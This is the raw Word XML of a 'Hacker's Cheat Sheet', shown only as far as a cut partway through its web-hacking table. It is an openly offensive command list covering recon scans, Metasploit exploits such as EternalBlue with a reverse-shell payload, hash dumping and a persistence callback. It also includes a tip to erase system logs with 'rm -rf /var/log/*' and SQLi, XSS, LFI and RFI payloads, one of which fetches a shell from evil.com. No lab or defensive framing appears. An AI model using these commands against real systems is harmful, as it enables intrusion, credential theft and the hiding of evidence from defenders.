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17BE2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacker’s Cheat Sheet (Beginner → Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA40E0" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="7F0DBE40">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027BEEC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1. Linux Essentials (Foundation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD42CC9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Every hacker must master Linux commands first.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4070"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="66D5D9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71F0C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6FEC4EF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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="160D0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19D6" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Show IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C18FF74" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>ip a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="4FF38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CE95" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Scan network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4077D357" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>netdiscover -r 192.168.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="79265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34F8D" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Download file (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="648FBBD9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>wget http://IP/file or curl -O http://IP/file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="16478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2351" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Start Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2301C74C" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>python3 -m http.server 8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="02558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5A7E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Search text in files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63CE746E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>grep -r "keyword" /path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="3F429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2A32" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB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6F5F8A1E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>chmod 755 file, chown user:user file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7978FC35" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> Always create aliases for long commands in .bashrc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317076F0" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="4D488D31">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FAE6D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2. Networking &amp; Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D237240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Recon = 70% of hacking.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400"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="1E6749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2D53E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01B9D1D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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="70BF4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0B3B" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="140DCEB2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>nmap -sV -A -p- target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="438F4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7150" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Masscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2727F92F" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>masscan -p1-65535 --rate=10000 target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="1AB28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6110" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>TheHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06558A98" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>theharvester -d target.com -l 200 -b google</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="1282B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A6A8" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Subfinder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36526894" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>subfinder -d target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="5C4E9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9C35" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Whois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="034A814A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>whois target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="7DEF1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07D9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Dig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CFF01A7" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>dig target.com ANY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57D65DEF" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> Use amass for deep subdomain enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DE6CEB" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="735D7906">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51055E11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3. Exploitation Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6A531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Once you know the service, attack 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4940"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="0CD65B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C1BAB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lastRenderedPageBreak/>
              <w:t>Exploit Style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212E6B48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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="5F467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C5D2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>FTP Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A4BF2A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="016032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B344" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>SMB Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF411EA" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="47F03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0389" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>HTTP Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DB79C33" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>use exploit/multi/http/tomcat_mgr_upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65AFB1A2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSF Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E903C" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>search exploit name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30155B" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>use exploit/path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB00972" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>set RHOSTS target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62671588" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>set RPORT 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1E84F" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F29F9BC" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>set LHOST your_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E95BC" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA331A1" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="63F8CE6B">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B3A948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4. Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172070C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Once inside → maintain &amp; escalate.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019"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="0CDB7B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533AC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71C1EEE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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="04316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6070" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Get System Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="047E8142" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="7DD2E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ABBA" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Check Users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73D2ECC9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>getuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="1AA3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05E86" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB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0C46FEA5" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>whoami /priv (Windows), sudo -l (Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="7B47E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123B" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Dump Hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2C0EFD" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="2B01F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4F88" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB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60E0CC14" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>run persistence -U -i 5 -p 4444 -r your_ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04E88133" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> Always clean logs → rm -rf /var/log/* (but carefully).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B13E5E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="5B13C6CC">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B288DF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5. Web Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34399BFE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Most real-world hacking = web apps.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7376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="33F36E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235F8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lastRenderedPageBreak/>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387D24A4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Tool/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="79EB2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D8A7" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45FC44E0" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>sqlmap -u "http://target.com/page.php?id=1" --dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="039B5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A597" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="044C7118" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="3E896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4DC2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>LFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FAF4AD" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>http://target.com/index.php?page=../../../../etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="40D99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320F" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>RFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181A37C1" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>http://target.com/index.php?page=http://evil.com/shell.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="60567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50CF" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
